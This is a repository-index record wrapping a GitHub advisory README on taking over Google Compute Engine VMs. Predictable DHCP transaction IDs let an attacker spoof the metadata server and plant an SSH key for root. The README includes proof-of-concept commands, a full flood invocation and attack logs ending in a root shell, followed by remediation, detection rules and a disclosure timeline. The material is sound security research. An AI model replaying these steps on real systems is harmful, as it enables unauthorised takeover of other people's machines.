{"id":13542911,"url":"https://github.com/irsl/gcp-dhcp-takeover-code-exec","last_synced_at":"2025-04-05T17:08:45.311Z","repository":{"id":43904897,"uuid":"380295867","full_name":"irsl/gcp-dhcp-takeover-code-exec","owner":"irsl","description":"Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent","archived":false,"fork":false,"pushed_at":"2021-07-30T18:56:39.000Z","size":33,"stargazers_count":535,"open_issues_count":5,"forks_count":35,"subscribers_count":20,"default_branch":"main","last_synced_at":"2025-03-29T16:09:50.177Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/irsl.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-06-25T16:28:06.000Z","updated_at":"2025-03-03T20:39:28.000Z","dependencies_parsed_at":"2022-08-12T10:51:43.838Z","dependency_job_id":null,"html_url":"https://github.com/irsl/gcp-dhcp-takeover-code-exec","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/irsl%2Fgcp-dhcp-takeover-code-exec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/irsl","download_url":"https://codeload.github.com/irsl/gcp-dhcp-takeover-code-exec/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247369952,"owners_count":20927928,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T11:00:19.700Z","updated_at":"2025-04-05T17:08:45.290Z","avatar_url":"https://github.com/irsl.png","language":"Go","funding_links":[],"categories":["Writeups:","Go","Mobile"],"sub_categories":["2021:","GCP/Google"],"readme":"# Abstract\r\n\r\nThis was an advisory about an unpatched vulnerability (at time of publishing this repo, 2021-06-25) affecting \r\nvirtual machines in Google's Compute Engine platform. The flaw is fixed by Google since (as of 2021-07-30).\r\nThe technical details below is almost exactly the same as my report sent to the VRP team.\r\n\r\nAttackers could take over virtual machines of the Google Cloud Platform over the network due to weak \r\nrandom numbers used by the ISC DHCP software and an unfortunate combination of additional factors.\r\nThis is done by impersonating the Metadata server from the targeted virtual machine's point of view.\r\nBy mounting this exploit, the attacker can grant access to themselves over SSH (public key authentication) \r\nso then they can login as the root user.\r\n\r\n\r\n# The vulnerability\r\n\r\nISC's implementation of the DHCP client (isc-dhcp-client package on the Debian flavors) relies on\r\nrandom(3) to generate pseudo-random numbers (a nonlinear additive feedback random). \r\nIt is [seeded](https://github.com/isc-projects/dhcp/blob/master/client/dhclient.c) with the srandom function as follows:\r\n\r\n```\r\n\t/* Make up a seed for the random number generator from current\r\n\t   time plus the sum of the last four bytes of each\r\n\t   interface's hardware address interpreted as an integer.\r\n\t   Not much entropy, but we're booting, so we're not likely to\r\n\t   find anything better. */\r\n\tseed = 0;\r\n\tfor (ip = interfaces; ip; ip = ip-\u003enext) {\r\n\t\tint junk;\r\n\t\tmemcpy(\u0026junk,\r\n\t\t       \u0026ip-\u003ehw_address.hbuf[ip-\u003ehw_address.hlen -\r\n\t\t\t\t\t    sizeof seed], sizeof seed);\r\n\t\tseed += junk;\r\n\t}\r\n\tsrandom(seed + cur_time + (unsigned)getpid());\r\n```\r\n\r\nThis effectively consists of 3 components:\r\n\r\n- the current unixtime when the process is started\r\n\r\n- the pid of the dhclient process\r\n\r\n- the sum of the last 4 bytes of the ethernet addresses (MAC) of the network interface cards\r\n\r\nOn the Google Cloud Platform, the virtual machines usually have only 1 NIC, something like this:\r\n\r\n```\r\nroot@test-instance-1:~/isc-dhcp-client/real3# ifconfig\r\nens4: flags=4163\u003cUP,BROADCAST,RUNNING,MULTICAST\u003e  mtu 1460\r\n        inet 10.128.0.2  netmask 255.255.255.255  broadcast 10.128.0.2\r\n        inet6 fe80::4001:aff:fe80:2  prefixlen 64  scopeid 0x20\u003clink\u003e\r\n        ether 42:01:0a:80:00:02  txqueuelen 1000  (Ethernet)\r\n        RX packets 1336873  bytes 128485980 (122.5 MiB)\r\n        RX errors 0  dropped 0  overruns 0  frame 0\r\n        TX packets 5708403  bytes 2012678044 (1.8 GiB)\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\n```\r\n\r\nNote that the last 4 bytes (`0a:80:00:02`) of the MAC address (`42:01:0a:80:00:02`) are actually the same as \r\nthe internal IP address of the box (`10.128.0.2`). This means, 1 of the 3 components is effectively public.\r\n\r\nThe pid of the dhclient process is predictable. The linux kernel assigns process IDs in a linear way.\r\nI found that the pid varies between 290 and 315 (by rebooting a Debian 10 based VM many times and \r\nchecking the pid), making this component of the seed easily predictable.\r\n\r\nThe unix time component has a more broad domain, but this turns out to be not a practical problem (see later).\r\n\r\nThe firewall/router of GCP blocks broadcast packets sent by VMs, so only the metadata server (169.254.169.254)\r\nreceives them. However, some phases of the DHCP protocol don't rely on broadcasts, and the packets to be sent\r\ncan be easily calculated and sent in advance.\r\n\r\nTo mount this attack, the attacker needs to craft multiple DHCP packets using a set of precalculated/suspected \r\nXIDs and flood the victim's dhclient directly (no broadcasts here). If the XID is correct, the victim machine applies \r\nthe network configuration. This is a race condition, but since the flood is fast and exhaustive, the metadata server \r\nhas no real chance to win.\r\n\r\nAt this point the attacker is in the position of reconfiguring the network stack of the victim.\r\n\r\nGoogle heavily relies on the Metadata server, including the distribution of ssh public keys. \r\nThe connection is secured at the network/routing layer and the server is not authenticated (no TLS, clear \r\nhttp only). The `google_guest_agent` process, that is responsible for processing the responses of the\r\nMetadata server, establishes the connection via the virtual hostname `metadata.google.internal` which\r\nis an alias in the `/etc/hosts` file. This file is managed by `/etc/dhcp/dhclient-exit-hooks.d/google_set_hostname`\r\nas a hook part of the DHCP response processing and the alias is normally added by this script at each \r\nDHCPACK.\r\nBy having full control over DHCP, the Metadata server can be impersonated. This attack has been found and \r\ndocumented by `Chris Moberly`, who inspired my research with his oslogin privesc write up here:\r\n\r\nhttps://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020\r\n\r\nThe difference is, flooding of the dhclient process is done remotely in my attack and the XIDs are guessed.\r\n\r\nThe attack consists of 2 phases:\r\n\r\n#1 Instructing the client to set the IP address of the rogue metadata server on the NIC.\r\nNo router is configured. This effectively cuts the internet connection of the box. \r\n`google_guest_agent` can't fall back to connecting the real metadata server.\r\nThis DHCP lease is short lived (15 seconds), so dhclient sends a DHCPREQUEST soon again and starts looking \r\nfor a new DHCPACK. \r\n\r\nSince a new ip address (the rouge metadata server) and new hostname (`metadata.google.com`) is part of this\r\nDHCPACK packet, the `google_set_hostname` function adds two lines like like below (35.209.180.239 is the rouge \r\nmetadata server I used):\r\n\r\n35.209.180.239 metadata.google.internal metadata  # Added by Google\r\n169.254.169.254 metadata.google.internal  # Added by Google\r\n\r\n\r\nThe attacker is still flooding at this point, and since ARP is not flushed quickly, these packets are \r\nstill delivered.\r\n\r\n#2. Restoring a working network stack, along with the valid router address. This DHCPACK does not contain a hostname,\r\nso `google_set_hostname` won't touch `/etc/hosts`. The poisoned `metadata.google.internal` entry remains in there.\r\n\r\nIn case multiple entries are present in the hosts file, the Linux kernel prioritizes the link-local address \r\n(169.254.169.254) lower than the routable ones.\r\n\r\nAt this point `google_guest_agent` can establish a TCP connection to the (rouge) metadata server, where it gets\r\na config that contains the attacker's ssh public key. The entry is populated into `/root/.ssh/authorized_keys`\r\nand the attacker can open a root shell remotely.\r\n\r\n\r\n# Attack scenarios\r\n\r\nAttackers would gain full access to the targeted virtual machines in all attack scenarios below.\r\n\r\n- Attack #1: Targeting a VM on the same subnet (~same project), while it is rebooting.\r\n  The attacker needs presence on another host.\r\n\r\n- Attack #2: Targeting a VM on the same subnet (~same project), while it is refreshing the lease (so no reboot is needed).\r\n  This takes place every half an hour (1800s), making 48 windows/attempts possible a day. \r\n  Since an F class VM has ~170.000 pps (packet per second), and a day of unixtime + potential pids makes ~86420 potential \r\n  XIDs, this is a feasible attack vector.\r\n  \r\n- Attack #3: Targeting a VM over the internet. This requires the firewall in front of the victim VM to be fully open. \r\n  Probably not a common scenario, but since even the webui of GCP Cloud Console has an option for that, there must be \r\n  quite some VMs with this configuration. \r\n  In this case the attacker also needs to guess the internal IP address of the VM, but since the first VM seems \r\n  to get `10.128.0.2` always, the attack could work, still.\r\n\r\n\r\n\r\n# Proof of concepts\r\n\r\n## Attack #1\r\n\r\nAs described above, you need to run a rogue metadata server running a host with port 80 open from the internet. \r\nI used 35.209.180.239 for this purpose (this is the public IP address of 10.128.0.2, a compute engine box actually), \r\nmeta.py is running here:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py\r\n\tUsage: ./meta.py id_rsa.pub\r\n\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py id_rsa.pub\r\n```\r\n\r\nMy proof of concept exploits a simplified setup, when the victim box is being rebooted. In this case unixtime\r\nof the dhclient process can be guessed easily.\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl\r\n\tUsage: ./takeover-at-reboot.pl victim-ip-address meta-ip-address\r\n```\r\n\r\nThe victim box is `10.128.0.4` here. The public IP address of this host is `34.67.219.89`.\r\nVerifying first we don't have access using the RSA private key that belongs to id_rsa.pub referenced above \r\nfor meta.py:\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tPermission denied (publickey).\r\n```\r\n\r\nThen the attack is started:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl 10.128.0.4 35.209.180.239\r\n\r\n\t10.128.0.4: alive: 1601231808...\r\n```\r\n\r\nThen I type reboot on the victim host (`10.128.0.4`). The rest of the output of `takeover-at-reboot.pl`:\r\n\t\r\n```\r\n\t10.128.0.4 seems to be not alive anymore\r\n\tRUN: ip addr show dev ens4 | awk '/inet / {print $2}' | cut -d/ -f1\r\n\tRUN: ip route show default | awk '/via/ {print $3}'\r\n\tNIC: ens4\r\n\tMin pid: 290\r\n\tMax pid: 315\r\n\tMin ts: 1601231808\r\n\tMax ts: 1601231823\r\n\tMy IP: 10.128.0.2\r\n\tRouter: 10.128.0.1\r\n\tTarget IP: 10.128.0.4\r\n\tTarget MAC: 42:01:0a:80:00:04\r\n\tNumber of potential xids: 41\r\n\tInitial OFFER+ACK flood\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 35.209.180.239\r\n\tNew hostname: metadata.google.internal\r\n\tNew route:\r\n\tACK: true\r\n\tOffer: true\r\n\tOneshot: false\r\n\tFlooding again to revert the original network config\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 10.128.0.4\r\n\tNew hostname:\r\n\tNew route: 10.128.0.1\r\n\tACK: true\r\n\tOffer: false\r\n\tOneshot: false\r\n```\r\n\r\nAfter this point, the output of the screen where meta.py is running is flooded with lines like this:\r\n\r\n```\r\n\t34.67.219.89 - - [27/Sep/2020 18:40:06] \"GET /computeMetadata/v1//?recursive=true\u0026alt=json\u0026wait_for_change=true\u0026timeout_sec=60\u0026last_etag=NONE HTTP/1.1\" 200 -\r\n```\r\n\r\nAt this point, I can login to victim box using the new (attacker controlled) SSH key.\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tLinux metadata 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64\r\n\r\n\tThe programs included with the Debian GNU/Linux system are free software;\r\n\tthe exact distribution terms for each program are described in the\r\n\tindividual files in /usr/share/doc/*/copyright.\r\n\r\n\tDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\n\tpermitted by applicable law.\r\n\troot@metadata:~# id\r\n\tuid=0(root) gid=0(root) groups=0(root),1000(google-sudoers)\r\n```\r\n\r\nThis was tested using the official Debian 10 images.\r\n\r\n\r\n\r\n\r\n## Attack #2\r\n\r\nTo verify this setup, I built a slightly modified version of dhclient; besides some additional log lines the only important change is the \r\nincreased frequency of lease renewals:\r\n\r\n```\r\n*** dhclient.c.orig     2020-09-29 23:38:16.322296529 +0200\r\n--- dhclient.c  2020-09-29 22:51:11.000000000 +0200\r\n*************** void bind_lease (client)\r\n*** 1573,1578 ****\r\n--- 1573,1580 ----\r\n          client-\u003enew = NULL;\r\n\r\n          /* Set up a timeout to start the renewal process. */\r\n+         client-\u003eactive-\u003erenewal = cur_time + 5; // hack!\r\n+\r\n          tv.tv_sec = client-\u003eactive-\u003erenewal;\r\n          tv.tv_usec = ((client-\u003eactive-\u003erenewal - cur_tv.tv_sec) \u003e 1) ?\r\n                          myrandom(\"active renewal\") % 1000000 : cur_tv.tv_usec;\r\n```\r\n\r\n\r\nA 10 minute window consists of ~600 potetial XIDs. I rebooted the victim host (`10.128.0.4`), logged in, ran\r\n`journalctl -f|grep dhclient` to see what is going on. Then I executed the `takeover-at-renew.pl` script \r\non the attacker machine (internal ip: `10.128.0.2`, external ip: `35.209.180.239`, a VM on the same subnet):\r\n\r\n```\r\n# ONESHOT_WINDOW_MIN=10 ./takeover-at-renew.pl 10.128.0.4 35.209.180.239\r\n```\r\n\r\nThis resulted the following log lines on the victim machine:\r\n\r\n```\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:11 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 10.128.0.2\r\nOct 02 07:06:32 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\nOct 02 07:06:37 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:44 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:46 metadata dhclient[301]: DHCPACK of 10.128.0.4 from 10.128.0.2\r\nOct 02 07:06:47 metadata dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\n```\r\n\r\nThis means the 6th round was successful. With \"normal\" lease renewal (unpatched `dhclient`), the same thing would have \r\ntaken ~3 hours.\r\n\r\nThe attack was indeed successful:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1       localhost\r\n::1             localhost ip6-localhost ip6-loopback\r\nff02::1         ip6-allnodes\r\nff02::2         ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata  # Added by Google\r\n169.254.169.254 metadata.google.internal  # Added by Google\r\n```\r\n\r\nI repeated the attack and flooded the victim with 3 hours of XIDs (~10000). The 51th DHCPREQUEST was hijacked (would \r\nhave taken a little bit more than a complete day with \"normal\" lease times).\r\nI concluded that the execution time indeed correlates with the number of XIDs. \r\nThis of course would decrease the success rate in real life setups, but the attack is still feasible.\r\n\r\n\r\n## Attack #3\r\n\r\nA prerequisite of this attack is the GCP firewall to be effectively turned off.\r\n\r\nI found that my DHCP related packets were not forwarded to the VM while the VM is rebooting (probably not after the \r\nlease is returned at reboot), effectively ruling out `takeover-at-discover.pl`.\r\n\r\nI decided to carry out an attack against the lease renewal (effectively the same as #2). My expectation was that it should\r\nstill be feasible.\r\n\r\nI tested this scenario using an AWS VM as the attacker machine and a really short time window (2 minutes).\r\nThe `meta.py` script was still running on the GCP attacker machine (external ip: 35.209.180.239).\r\nI rebooted the victim machine (internal ip: `10.128.0.4`, external ip: `34.122.27.253`), logged in, ran `journalctl -f|grep dhclient`.\r\n\r\nThen on the AWS attacker machine (external ip: `3.136.97.244`), I executed this command:\r\n\r\n```\r\nroot@ip-172-31-25-197:~/real8# NIC=eth0 ONESHOT_WINDOW_MIN=2 FINAL_IP=10.128.0.4 MY_ROUTER=10.128.0.1 ./takeover-at-renew.pl 34.122.27.253  35.209.180.239\r\nFlooding destination between with XIDs between 1601651865 and 1601651984\r\nRUN: ip addr show dev eth0 | awk '/inet / {print $2}' | cut -d/ -f1\r\nRUN: /root/real8/randr 10.128.0.4 290 315 1601651865 1601651984 2\u003e/dev/null | paste -sd ',' - \u003e/tmp/xids.txt\r\nNIC: eth0\r\nMin pid: 290\r\nMax pid: 315\r\nMin ts: 1601651865\r\nMax ts: 1601651984\r\nAttacker IP: 172.31.25.197\r\nRouter: 10.128.0.1\r\nTarget IP (initial phase): 34.122.27.253\r\nTarget MAC: 42:01:0a:80:00:04\r\nTarget IP (final phase): 10.128.0.4\r\n34.122.27.253 is alive\r\nStart flooding the victim for 1801 sec\r\nAnd monitoring it in the background\r\nRunning for 1801 sec in the background: /root/real8/flood -ack -lease 15 -dev eth0 -dstip 34.122.27.253 -newhost metadata.google.internal -newip 35.209.180.239 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 35.209.180.239\r\nNew hostname: metadata.google.internal\r\nNew route:\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\nThe host is down, it probably swallowed the poison ivy!\r\nAnd now some flood again to revert connectivity\r\nit seems the attack was successful\r\nroot@ip-172-31-25-197:~/real8# Running for 12 sec in the background: /root/real8/flood -ack -ack -lease 1800 -dev eth0 -dstip 34.122.27.253 -newip 10.128.0.4 -route 10.128.0.1 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 10.128.0.4\r\nNew hostname:\r\nNew route: 10.128.0.1\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\n```\r\n\r\nThis was running for a while and finally succeeded at the 21th DHCPREQUEST. With normal lease times this would have taken ~11 hours.\r\nThe metadata server was taken over successfully:\r\n\r\n```\r\nOct 02 15:21:30 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 3.136.97.244\r\nOct 02 15:21:30 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\n```\r\n\r\nThe host file was modified according to the expectations:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1       localhost\r\n::1             localhost ip6-localhost ip6-loopback\r\nff02::1         ip6-allnodes\r\nff02::2         ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata  # Added by Google\r\n169.254.169.254 metadata.google.internal  # Added by Google\r\n```\r\n\r\nAnd also got some connections from the osconfig agent (the kept-alive connection of the guest agent probably survived the network change)\r\n\r\n```\r\n34.122.27.253 - - [02/Oct/2020 15:29:09] \"PUT /computeMetadata/v1/instance/guest-attributes/guestInventory/Hostname HTTP/1.1\" 501 -\r\n```\r\n\r\nWhen I repeated this attack (2 minute XID window still), the 5th round was successful (2.5 hours with normal leases).\r\n\r\n\r\nConclusion about attack #2 and #3: not the most reliable thing on earth, but definetely possible. I think if I kept the victim host down\r\nlonger than the TCP read timeout of google_guest_agent, then the existing metadata server connection would be interrupted, then \r\nwhile reinitiating the connection after the network connectivity was restored, it would hit the fake metadata server.\r\n\r\n\r\n\r\n# Remediation\r\n\r\n- Get in touch with ISC. They really need to improve the srandom setup. Maybe get a new feature added that drops packets by \r\n  non-legitimate DHCP servers (so you could rely on this as an additional security measure).\r\n- Even if ISC has improved their software, it won't be upgraded on most of your VMs. Analyze your firewall logs to learn \r\n  if you have any clients that rely on these ports for any legitimate reasons.\r\n  Block udp/68 between VMs, so that only the metadata server could could carry out DHCP.\r\n- Stop using the Metadata server via this virtual hostname (metadata.google.internal). At least in your official agents.\r\n- Stop managing the virtual hostname (metadata.google.internal) via DHCP. The IP address is documented to be stable anyway.\r\n- Secure the communication with the Metadata server by using TLS, at least in your official agents.\r\n\r\nNote, using a random generated MAC address wouldn't prevent mounting the attack on the same subnet.\r\n\r\n# FAQ\r\n\r\n** - The issue seems generic. Are other cloud providers affected as well? **\r\n\r\n- I checked only the major ones, they were not affected (at least at the time of checking) due to another factors \r\n  (e.g. not using DHCP by default).\r\n\r\n** - If Google doesn't fix this, what can I do? **\r\n\r\n- Google usually closes bug reports with status \"Unfeasible\" when the efforts required to fix outweigh the risk. \r\n  This is not the case here. I think there is some technical complexity in the background, which doesn't allow\r\n  them deploying a network level protection measure easily.\r\n  Until the fix arrives, consider one of the followings:\r\n  - don't use DHCP\r\n  - setup a host level firewall rule to ensure the DHCP communication comes from the metadata server (169.254.169.254)\r\n  - setup a GCP/VPC/Firewall rule blocking udp/68 as is (all source, all destination) [more info](https://github.com/irsl/gcp-dhcp-takeover-code-exec/issues/4#issuecomment-872145234)\r\n\r\nGoogle's official guidance to block untrusted internal traffic to exploit this flaw:\r\n\r\n---\r\n\u003e To block incoming traffic over UDP port 68, adjust the following gCloud command syntax for your environment:\r\n\u003e \r\n\u003e ```\r\n\u003e gcloud --project=\u003cyour-project\u003e compute firewall-rules create block-dhcp --action=DENY --rules=udp:68 --network=\u003cyour-network\u003e --priority=100\r\n\u003e ```\r\n\u003e \r\n\u003e * The above command will create a firewall rule named `\"block-dhcp\"` in the specified project and VPC that will block all inbound traffic over UDP port 68 \r\n\u003e * Setting the priority to `100` gives the rule a high priority, but other values can be used. We recommend setting this value [as low as possible](https://cloud.google.com/vpc/docs/firewalls#priority_order_for_firewall_rules) to prevent other rules from superseding it \r\n\u003e * The command will need to be executed for each VPC you wish to block DHCP on by replacing `\u003cyour-network\u003e` with the respective VPC\r\n\u003e * Note that firewall rule names cannot be reused within the same project; multiple rules for different VPCs in a project will need to have different names (`block-dhcp2`, `block-dhcp-vpcname`, etc)\r\n\u003e * Additional information on configuring firewall rules can be in Google Cloud documentation [here](https://cloud.google.com/vpc/docs/using-firewalls).\r\n---\r\n\r\n** - How to detect this attack? **\r\n\r\nDHCP renewal usually yields only a few packets every 30 minutes (per host). This attack requires sending a flood of\r\nDHCP packets (hundreds of thousands of packets per second). Setting a rate limiter could probably detect or prevent\r\nthe attack:\r\n\r\n```\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --set\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --update --seconds 1 --hitcount 10 -j LOG --log-prefix \"DHCP attack detected \"\r\n```\r\n\r\n** - What is the internal ID of this bug in Google's bug tracker? **\r\n\r\nhttps://issuetracker.google.com/issues/169519201\r\n\r\n** - Is this a vulnerability of ISC dhclient? **\r\n\r\nWhile a PRNG with more entropy sources could have prevented this flaw being exploitable in GCP, I still think this is not \r\na vulnerability of their implementation for the following two reasons:\r\n- DHCP XIDs are public (broadcasted on the same LAN) anyway\r\n- with regular IP/MAC setups (=where they are not predictable/static) and udp/68 exposed, not even the current \"weak\" PRNG \r\n  would be practically exploitable\r\n\r\nNote: in the meanwhile, Google has identified an [additional attack vector](https://gitlab.isc.org/isc-projects/dhcp/-/issues/197)\r\ngaining an MitM position for a local threat actor.\r\n\r\n\r\n# Timeline\r\n\r\n* 2020-09-26: Issue identified, attack #1 validated\r\n* 2020-09-27: Reported to Google VRP\r\n* 2020-09-29: VRP triage is complete \"looking into it\"\r\n* 2020-10-02: Further details shared about attack #2 and #3\r\n* 2020-10-07: Accepted, \"Nice catch\"\r\n* 2020-12-02: Update requested about the estimated time of fix\r\n* 2020-12-03: ... \"holiday season coming up\"\r\n* 2021-06-07: Asked Google if a fix is coming in a reasonable time, as I'm planning to publish an advisory\r\n* 2021-06-08: Standard response \"we ask for a reasonable advance notice.\"\r\n* 2021-06-25: Public disclosure\r\n* 2021-07-30: \"Our systems show that all the bugs we created based on your report have been fixed by the product team.\"\r\n\r\n# Credits\r\n\r\n[Imre Rad](https://www.linkedin.com/in/imre-rad-2358749b/)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Firsl%2Fgcp-dhcp-takeover-code-exec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Firsl%2Fgcp-dhcp-takeover-code-exec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Firsl%2Fgcp-dhcp-takeover-code-exec/lists"}